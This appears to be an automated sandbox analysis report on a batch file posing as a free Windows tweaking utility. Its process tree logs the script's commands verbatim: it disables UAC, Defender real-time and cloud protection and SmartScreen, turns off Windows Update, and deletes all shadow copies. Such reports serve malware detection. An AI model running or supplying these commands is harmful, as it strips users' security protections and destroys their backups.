Resubmissions

21-11-2024 10:17

241121-mbp4ca1mft 10

21-11-2024 10:13

241121-l89ctawjak 10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 10:13

General

  • Target

    Octo Free Tweaking Utility V1.0.bat

  • Size

    32KB

  • MD5

    8392add3fcbeded059c0788e13305148

  • SHA1

    aabebd21818beb9d92354a26bff3b091f6d33070

  • SHA256

    bd035666f01df67518bf6a7976e58d019fe4281b7cc959bc623b5bbc8cb6aa31

  • SHA512

    454321ad19d4544632c51d02a2cd9adb48d856a982e45afdf2c2abd06412a212bb4ee60075ceee1f46370ecb722ed73d0749fd9cae1f627cfd3013d221728774

  • SSDEEP

    384:5TFAFXvNHSuTB4VPVVpZzBYqvRBzalRL/TJ:5TqXDSPVVpZzclRL/TJ

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • UAC bypass 3 TTPs 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Stops running service(s) 4 TTPs
  • Deletes itself 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to get system information.

  • Power Settings 1 TTPs 46 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 3 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"
    1⤵
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Windows\system32\findstr.exe
        findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"
        3⤵
          PID:2700
      • C:\Windows\system32\powercfg.exe
        powercfg -change -monitor-timeout-ac 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2684
      • C:\Windows\system32\powercfg.exe
        powercfg -change -monitor-timeout-dc 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
      • C:\Windows\system32\powercfg.exe
        powercfg -change -standby-timeout-ac 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2108
      • C:\Windows\system32\powercfg.exe
        powercfg -change -standby-timeout-dc 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2672
      • C:\Windows\system32\powercfg.exe
        powercfg -setactive scheme_max
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2908
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_processor PROCTHROTTLEMAX 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2796
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_processor PROCTHROTTLEMAX 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2828
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_processor PROCTHROTTLEMIN 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_processor PROCTHROTTLEMIN 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2580
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_display brightness 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_display brightness 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2744
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_disk disk_idle 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2692
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_disk disk_idle 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1236
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_disk idle_time 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2720
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_disk idle_time 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_usb selective_suspend 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2608
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_usb selective_suspend 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2792
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_video adaptive_display 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2556
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_video adaptive_display 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2564
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_display brightness 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_display brightness 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2596
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_cpu idle_timeout 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2620
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_cpu idle_timeout 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2632
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_hybrid sleep 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2724
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_hybrid sleep 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1776
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_graphics adaptive_graphics 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:3004
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_graphics adaptive_graphics 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2612
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_processor PERFDISPLAY 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2148
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_processor PERFDISPLAY 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1272
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_processor PROCFREQUENCY 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2056
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_processor PROCFREQUENCY 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1772
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_video dynamic_contrast 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1812
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_video dynamic_contrast 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1624
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_dvd video_speed 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2644
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_dvd video_speed 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1928
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_system cooling_policy 1
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2196
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_system cooling_policy 1
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2200
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_system processor_power_policy 1
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1456
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_system processor_power_policy 1
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2412
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_memory standby_policy 1
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2396
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_memory standby_policy 1
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2204
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_system cpu_core 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2392
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_system cpu_core 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2652
      • C:\Windows\system32\powercfg.exe
        powercfg /setacvalueindex scheme_max sub_processor clock_speed 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1768
      • C:\Windows\system32\powercfg.exe
        powercfg /setdcvalueindex scheme_max sub_processor clock_speed 100
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:300
      • C:\Windows\system32\powercfg.exe
        powercfg -h off
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:904
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"
        2⤵
          PID:2280
          • C:\Windows\system32\findstr.exe
            findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\Octo Free Tweaking Utility V1.0.bat"
            3⤵
              PID:752
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-310093Enabled" /t REG_DWORD /d 0 /f
            2⤵
              PID:2732
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Get-CimInstance -ClassName Win32_StartupCommand | Remove-CimInstance"
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2656
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Set-Service -Name "wuauserv" -StartupType Disabled # Windows Update Service"
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Set-Service -Name "Spooler" -StartupType Disabled # Print Spooler"
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2940
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Set-Service -Name "RemoteRegistry" -StartupType Disabled"
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1792
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Set-Service -Name "Superfetch" -StartupType Disabled "
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1264
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Set-Service -Name "WMPNetworkSvc" -StartupType Disabled Set-MpPreference -DisableRealtimeMonitoring $true"
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2116
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f
              2⤵
                PID:296
              • C:\Windows\system32\sc.exe
                sc config werSvc start= disabled
                2⤵
                • Launches sc.exe
                PID:1428
              • C:\Windows\system32\sc.exe
                sc stop werSvc
                2⤵
                • Launches sc.exe
                PID:864
              • C:\Windows\system32\vssadmin.exe
                vssadmin list shadowstorage
                2⤵
                • Interacts with shadow copies
                PID:1000
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /for=C: /all
                2⤵
                • Interacts with shadow copies
                PID:1572
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Get-WmiObject -Class Win32_PrintJob | foreach { $_.Delete() }"
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1584
              • C:\Windows\system32\reg.exe
                reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 1 /f
                2⤵
                  PID:1236
                • C:\Windows\system32\reg.exe
                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableActionCenter" /t REG_DWORD /d 0 /f
                  2⤵
                    PID:2720
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
                    2⤵
                    • UAC bypass
                    PID:2668
                  • C:\Windows\system32\reg.exe
                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "FileHistory" /t REG_DWORD /d 0 /f
                    2⤵
                      PID:2608
                    • C:\Windows\system32\reg.exe
                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "Enabled" /t REG_DWORD /d 0 /f
                      2⤵
                        PID:2792
                      • C:\Windows\system32\reg.exe
                        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
                        2⤵
                          PID:2556
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Set-MpPreference -DisableScanOnRealtimeEnable $true"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2564
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d 0 /f
                          2⤵
                            PID:2384
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Set-MpPreference -DisableCloudProtection $true"
                            2⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1752
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "NoLockScreen" /t REG_DWORD /d 1 /f
                            2⤵
                              PID:2120
                            • C:\Windows\system32\reg.exe
                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "WindowsStore" /t REG_DWORD /d 0 /f
                              2⤵
                                PID:2008
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d 0 /f
                                2⤵
                                  PID:2316
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command "Set-Service -Name "w32time" -StartupType Disabled"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2060
                                • C:\Windows\system32\reg.exe
                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisableLogonScripts" /t REG_DWORD /d 1 /f
                                  2⤵
                                    PID:744
                                • C:\Windows\explorer.exe
                                  "C:\Windows\explorer.exe"
                                  1⤵
                                    PID:2540
                                  • C:\Windows\explorer.exe
                                    "C:\Windows\explorer.exe"
                                    1⤵
                                      PID:2388
                                    • C:\Windows\system32\vssvc.exe
                                      C:\Windows\system32\vssvc.exe
                                      1⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:908

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                      Filesize

                                      7KB

                                      MD5

                                      5980ced64499d5dda1dd3aa2a20e99c7

                                      SHA1

                                      acac427fdb104025df9f4748769efe1d77163008

                                      SHA256

                                      c9a998dc0abf6798ebbf4326cb31a0a7f911865ba9c099fa8bb592ca75a3309a

                                      SHA512

                                      ec1bde10a6b996bc232e26245e9e47024135eabcfac72c37d3f7eb7b88e9fb92f7489435cbfc2ad88056bdcf57f7f0e5134f226299b006275d4f03295f415ff7

                                    • memory/1620-11-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

                                      Filesize

                                      2.9MB

                                    • memory/1620-12-0x0000000001E00000-0x0000000001E08000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/2656-4-0x000000001B660000-0x000000001B942000-memory.dmp

                                      Filesize

                                      2.9MB

                                    • memory/2656-5-0x0000000002630000-0x0000000002638000-memory.dmp

                                      Filesize

                                      32KB